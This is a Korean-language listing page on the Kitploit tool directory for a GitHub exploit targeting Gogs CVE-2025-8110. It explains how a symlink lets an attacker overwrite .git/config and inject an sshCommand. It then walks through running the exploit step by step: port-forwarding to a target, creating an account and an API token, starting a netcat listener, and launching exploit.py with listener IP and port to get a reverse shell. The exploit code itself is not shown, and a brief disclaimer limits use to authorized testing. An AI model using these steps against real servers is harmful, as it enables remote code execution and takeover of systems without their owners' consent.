Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
도구/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

저장소 보기
135개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Gogs CVE-2025-8110 RCE 익스플로잇

Gogs의 CVE-2025-8110에 대한 자동화된 Python 익스플로잇입니다. 이 취약점은 PutContents API를 악용하여 원격 코드 실행(RCE)을 가능하게 하며, 해당 API는 파일 경로가 심볼릭 링크인지 검증하지 않습니다. 심볼릭 링크를 통해 내부 .git/config 파일을 덮어씀으로써 악의적인 sshCommand를 주입하여 리버스 셸을 트리거할 수 있습니다.

🛠️ 사전 요구 사항

Python 3 및 필요한 종속성이 설치되어 있는지 확인하세요.

root@kitploit:~
pip install requests rich beautifulsoup4

또한 git이 설치되어 있고 $PATH에 있어야 저장소 복제 및 커밋 단계를 수행할 수 있습니다.

⚙️ 설정 및 구성

1. Gogs WebUI 접근

Gogs는 127.0.0.1:3001에 바인딩되어 있을 수 있습니다. 로컬에서 WebUI에 접근하려면 포트 포워딩을 사용하세요.

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. 계정 생성

포워딩이 완료되면 http://localhost:3001로 이동합니다.

  • 새 계정을 만듭니다.
  • 스크립트를 위해 사용자 이름과 비밀번호를 기록해 둡니다.

3. API 토큰 생성

스크립트는 Gogs API를 사용하여 페이로드를 전달합니다.

  1. WebUI에 로그인합니다.
  2. 설정 -> 애플리케이션으로 이동합니다.
  3. 개인 액세스 토큰 관리에서 새 토큰을 생성합니다.
  4. 토큰을 즉시 복사합니다.

🚀 실행

1. Netcat 리스너 시작

스크립트를 실행하기 전에 리스너를 시작하세요. API 업데이트가 처리되는 즉시 셸이 트리거됩니다.

root@kitploit:~
nc -lvnp 5555

2. 익스플로잇 실행

자격 증명과 토큰을 인수로 전달합니다.

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

인수

Flag설명
-uGogs 인스턴스의 기본 URL (예: http://localhost:3001).
-un생성한 계정의 사용자 이름.
-pw생성한 계정의 비밀번호.
-t설정에서 생성한 API 토큰.
-lh리스너의 IP 주소 (LHOST).
-lp리스너의 포트 (LPORT).

참고: 스크립트가 멈추거나 "Overwriting .git/config" 후 Read timed out 오류가 반환되면 리스너를 확인하세요. 이는 보통 리버스 셸이 성공적으로 연결되어 연결을 유지하고 있음을 나타냅니다.


저자: TYehan

면책 조항: 이 도구는 교육 목적과 승인된 보안 감사 전용입니다. 책임감 있게 사용하세요.

도구 다운로드